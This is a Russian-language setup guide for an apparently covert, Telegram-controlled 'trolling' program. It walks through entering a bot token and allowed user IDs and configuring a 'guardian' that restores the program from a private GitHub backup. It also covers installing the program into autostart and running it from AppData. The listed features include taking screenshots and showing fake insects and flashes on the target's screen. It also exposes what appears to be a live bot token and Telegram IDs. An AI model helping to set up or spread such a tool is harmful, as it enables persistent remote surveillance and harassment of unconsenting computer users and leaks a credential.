╔═══════════════════════════════════════════════════════════════╗
║                                                               ║
║         ⚡ БЫСТРАЯ НАСТРОЙКА - 3 ШАГА!                        ║
║                                                               ║
╚═══════════════════════════════════════════════════════════════╝

📋 ЧТО НУЖНО НАСТРОИТЬ:
═══════════════════════════════════════════════════════════════

✅ ШАГ 1: BOT.PY
───────────────────────────────────────────────────────────────
Откройте файл: bot.py

Строка 39 - Токен бота:
BOT_TOKEN = "7876495802:AAGixaO2S7MWJnFFA_VWnKPr2M320zIC3Iw"
            ↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
            ЗАМЕНИТЕ НА ВАШ ТОКЕН ОТ @BotFather

Строка 42 - ID пользователей:
ALLOWED_USERS = [1854451325, 5516562490, 495434214]
                 ↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
                 ЗАМЕНИТЕ НА ВАШИ TELEGRAM ID
                 (Узнать: напишите @userinfobot)

───────────────────────────────────────────────────────────────

✅ ШАГ 2: GUARDIAN.PY (ОПЦИОНАЛЬНО НО РЕКОМЕНДУЕТСЯ!)
───────────────────────────────────────────────────────────────
Откройте файл: guardian.py

Строка 23 - GitHub репозиторий:
GITHUB_BACKUP_URL = "https://github.com/YOUR_USERNAME/YOUR_REPO/archive/refs/heads/main.zip"
                                     ↑↑↑↑↑↑↑↑↑↑↑↑↑  ↑↑↑↑↑↑↑↑
                                     ВАШ USER    ВАШ РЕПО

🔹 Как получить ссылку:
   1. Зайдите на github.com
   2. Создайте новый репозиторий (обязательно ПРИВАТНЫЙ!)
   3. Загрузите туда ВСЕ файлы проекта
   4. Скопируйте ссылку в формате:
      https://github.com/USER/REPO/archive/refs/heads/main.zip

Пример:
GITHUB_BACKUP_URL = "https://github.com/john_doe/troling-backup/archive/refs/heads/main.zip"

───────────────────────────────────────────────────────────────

✅ ШАГ 3: ДОБАВЬТЕ ВАШИ GIF (если есть другие)
───────────────────────────────────────────────────────────────
Откройте файл: guardian.py

Строка 65-68 - Список GIF файлов:

# GIF файлы (добавьте все ваши GIF!)
'photo/mosquitoes-13105_256.gif': os.path.join(PROGRAMS_DIR, 'photo', 'mosquitoes-13105_256.gif'),
# Добавьте здесь другие GIF если есть:
# 'photo/spider.gif': os.path.join(PROGRAMS_DIR, 'photo', 'spider.gif'),
# 'photo/fly.gif': os.path.join(PROGRAMS_DIR, 'photo', 'fly.gif'),

🔹 Если у вас есть другие GIF:
   1. Раскомментируйте строку (уберите #)
   2. Замените имя файла на ваше
   3. Сохраните

───────────────────────────────────────────────────────────────

✅ ГОТОВО! ЗАПУСК:
═══════════════════════════════════════════════════════════════

1. Установите зависимости:
   pip install -r requirements.txt

2. Запустите бота:
   python bot.py

3. В Telegram:
   /start

4. Проверьте все функции:
   📸 Скриншот
   🕷️ Фейковые насекомые
   ⚡ Внезапные вспышки
   😈 Все троллинг-функции

5. Установите в автозагрузку:
   /start → ⚙️ Установить в автозагрузку

───────────────────────────────────────────────────────────────

📝 ДОПОЛНИТЕЛЬНЫЕ ФАЙЛЫ:
═══════════════════════════════════════════════════════════════

Читайте:
✅ START_HERE.txt       - Полная инструкция
✅ APPDATA_SETUP.md     - Настройка работы из AppData
✅ QUICK_START.md       - Быстрый старт
✅ SETUP_GUARDIAN.txt   - Детали настройки Guardian

───────────────────────────────────────────────────────────────

⚠️ ВАЖНО:
═══════════════════════════════════════════════════════════════

1. Guardian БЕЗ GitHub будет работать только с локальным бэкапом
2. Для полной защиты ОБЯЗАТЕЛЬНО настройте GitHub
3. Используйте ПРИВАТНЫЙ репозиторий (не публичный!)
4. Проверьте что ВСЕ файлы загружены на GitHub (особенно photo/)

───────────────────────────────────────────────────────────────

🚀 ВСЁ НАСТРОЕНО? ЗАПУСКАЙТЕ!
═══════════════════════════════════════════════════════════════

python bot.py

Приятного троллинга! 😈

═══════════════════════════════════════════════════════════════
